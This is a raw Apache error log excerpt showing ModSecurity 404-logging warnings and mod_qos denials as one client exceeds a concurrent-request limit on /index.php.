[Tue May 26 19:54:43.408812 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKUqK9k_ZUB2Vp25KugAAAgk"]
[Tue May 26 19:54:43.417960 2026] [security2:error] [pid 86490:tid 86697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEEgAAANI"]
[Tue May 26 19:54:43.424261 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LD6gAAAP8"]
[Tue May 26 19:54:43.433135 2026] [security2:error] [pid 86490:tid 86733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEEQAAAPY"]
[Tue May 26 19:54:43.433888 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LD7AAAAMw"]
[Tue May 26 19:54:43.437936 2026] [security2:error] [pid 93868:tid 94382] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K0gAAAgs"]
[Tue May 26 19:54:43.439512 2026] [security2:error] [pid 93868:tid 94357] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25KzAAAAfI"]
[Tue May 26 19:54:43.440242 2026] [security2:error] [pid 86490:tid 86632] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LD7QAAAJE"]
[Tue May 26 19:54:43.444997 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEDQAAAMM"]
[Tue May 26 19:54:43.455152 2026] [security2:error] [pid 93868:tid 94294] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25KyAAAAbM"]
[Tue May 26 19:54:43.470921 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25KzQAAAcA"]
[Tue May 26 19:54:43.479784 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEIAAAALE"]
[Tue May 26 19:54:43.481865 2026] [security2:error] [pid 93868:tid 94363] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K1QAAAfg"]
[Tue May 26 19:54:43.593728 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEgQAAALQ
[Tue May 26 19:54:43.597947 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEggAAANY
[Tue May 26 19:54:43.598320 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszS4AAAAHI
[Tue May 26 19:54:43.600873 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtK2DRMqfxdEDkoszS4QAAACg
[Tue May 26 19:54:43.601189 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtK2DRMqfxdEDkoszS4gAAAF8
[Tue May 26 19:54:43.613674 2026] [qos:error] [pid 93868:tid 94279] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtK0qK9k_ZUB2Vp25LCQAAAaQ
[Tue May 26 19:54:43.660049 2026] [qos:error] [pid 86490:tid 86729] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEhAAAAPI
[Tue May 26 19:54:43.664290 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK0qK9k_ZUB2Vp25LDAAAAbI
[Tue May 26 19:54:43.742845 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEhgAAAOw
[Tue May 26 19:54:43.750377 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEiAAAAPY
[Tue May 26 19:54:43.753375 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszS5QAAAF4
[Tue May 26 19:54:43.795942 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszS5gAAABk
[Tue May 26 19:54:43.797685 2026] [qos:error] [pid 86490:tid 86680] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEjgAAAME
[Tue May 26 19:54:43.800242 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEjwAAAJE
[Tue May 26 19:54:43.809915 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEkgAAAMI
[Tue May 26 19:54:43.824781 2026] [qos:error] [pid 93868:tid 94379] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK0qK9k_ZUB2Vp25LEAAAAgg
[Tue May 26 19:54:43.861694 2026] [qos:error] [pid 93868:tid 94356] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK0qK9k_ZUB2Vp25LEwAAAfE
[Tue May 26 19:54:43.892965 2026] [qos:error] [pid 86490:tid 86661] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LElQAAAK4
[Tue May 26 19:54:43.903633 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LElgAAALE
[Tue May 26 19:54:43.907185 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszS6QAAAEA
[Tue May 26 19:54:43.944822 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK2DRMqfxdEDkoszS6gAAADA
[Tue May 26 19:54:43.947427 2026] [qos:error] [pid 86490:tid 86649] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LElwAAAKI
[Tue May 26 19:54:43.952937 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEmAAAAM0
[Tue May 26 19:54:43.960387 2026] [qos:error] [pid 86490:tid 86714] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEmQAAAOM
[Tue May 26 19:54:43.976216 2026] [qos:error] [pid 86490:tid 86699] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK1ZMwN0DpLVWo6LEmgAAANQ
[Tue May 26 19:54:43.980852 2026] [qos:error] [pid 93868:tid 94276] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtK0qK9k_ZUB2Vp25LFAAAAaE
[Tue May 26 19:54:44.055678 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEngAAANk
[Tue May 26 19:54:44.057578 2026] [qos:error] [pid 93868:tid 94303] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLEqK9k_ZUB2Vp25LFwAAAbw
[Tue May 26 19:54:44.061058 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEoAAAALg
[Tue May 26 19:54:44.064711 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLGDRMqfxdEDkoszS7AAAAHo
[Tue May 26 19:54:44.093533 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLGDRMqfxdEDkoszS7QAAADw
[Tue May 26 19:54:44.096520 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEoQAAAKw
[Tue May 26 19:54:44.107067 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEogAAAMs
[Tue May 26 19:54:44.109919 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEowAAAK8
[Tue May 26 19:54:44.128009 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:49468] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEpAAAAN0
[Tue May 26 19:54:44.133186 2026] [qos:error] [pid 93868:tid 94347] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLEqK9k_ZUB2Vp25LGAAAAeg
[Tue May 26 19:54:44.200244 2026] [security2:error] [pid 86490:tid 86738] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEiwAAAPs"]
[Tue May 26 19:54:44.208416 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEpgAAAN4
[Tue May 26 19:54:44.215288 2026] [qos:error] [pid 93868:tid 94375] [client 45.148.10.120:49458] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLEqK9k_ZUB2Vp25LGQAAAgQ
[Tue May 26 19:54:44.216503 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEpwAAALQ
[Tue May 26 19:54:44.241350 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLGDRMqfxdEDkoszS7wAAAD0
[Tue May 26 19:54:44.246993 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEqAAAAMg
[Tue May 26 19:54:44.259239 2026] [qos:error] [pid 86490:tid 86732] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEqgAAAPU
[Tue May 26 19:54:44.259242 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtLFZMwN0DpLVWo6LEqQAAANY
[Tue May 26 19:54:44.277482 2026] [security2:error] [pid 86490:tid 86640] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKVZMwN0DpLVWo6LD0AAAAJk"]
[Tue May 26 19:54:44.283256 2026] [security2:error] [pid 93868:tid 94318] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K0wAAAcs"]
[Tue May 26 19:54:44.283487 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25KzwAAAg4"]
[Tue May 26 19:54:44.284495 2026] [security2:error] [pid 93868:tid 94302] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K3gAAAbs"]
[Tue May 26 19:54:44.286674 2026] [security2:error] [pid 93868:tid 94278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K2QAAAaM"]
[Tue May 26 19:54:44.303506 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K4wAAAa8"]
[Tue May 26 19:54:44.307825 2026] [security2:error] [pid 86490:tid 86630] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEIgAAAI8"]
[Tue May 26 19:54:44.308731 2026] [security2:error] [pid 86490:tid 86698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEHwAAANM"]
[Tue May 26 19:54:44.311989 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K1gAAAco"]
[Tue May 26 19:54:44.322295 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K4AAAAZk"]
[Tue May 26 19:54:44.335611 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszSxwAAADQ"]
[Tue May 26 19:54:44.344263 2026] [security2:error] [pid 86490:tid 86626] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEYAAAAIs"]
[Tue May 26 19:54:44.347826 2026] [security2:error] [pid 93868:tid 94263] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25K9gAAAZQ"]
[Tue May 26 19:54:44.355449 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K3wAAAa0"]
[Tue May 26 19:54:44.364880 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LELAAAAM8"]
[Tue May 26 19:54:44.365513 2026] [security2:error] [pid 93576:tid 93818] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszSxAAAAGo"]
[Tue May 26 19:54:44.366220 2026] [security2:error] [pid 86490:tid 86673] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEVwAAALo"]
[Tue May 26 19:54:44.370822 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K5gAAAgI"]
[Tue May 26 19:54:44.385732 2026] [security2:error] [pid 86490:tid 86648] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEXgAAAKE"]
[Tue May 26 19:54:44.386172 2026] [security2:error] [pid 93868:tid 94289] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K5QAAAa4"]
[Tue May 26 19:54:44.391271 2026] [security2:error] [pid 93576:tid 93838] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszSzAAAAH4"]
[Tue May 26 19:54:44.395058 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEKgAAAQA"]
[Tue May 26 19:54:44.396288 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K4QAAAfs"]
[Tue May 26 19:54:44.400806 2026] [security2:error] [pid 86490:tid 86656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEZAAAAKk"]
[Tue May 26 19:54:44.408394 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKkqK9k_ZUB2Vp25K5wAAAZw"]
[Tue May 26 19:54:44.413330 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK1ZMwN0DpLVWo6LEZQAAAJM"]
[Tue May 26 19:54:44.415688 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25K9AAAAc8"]
[Tue May 26 19:54:44.422313 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszSzQAAAHY"]
[Tue May 26 19:54:44.423023 2026] [security2:error] [pid 93576:tid 93793] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK2DRMqfxdEDkoszSyAAAAFE"]
[Tue May 26 19:54:44.432956 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtKlZMwN0DpLVWo6LEMAAAAO4"]
[Tue May 26 19:54:44.438724 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtK0qK9k_ZUB2Vp25K_AAAAfw"]
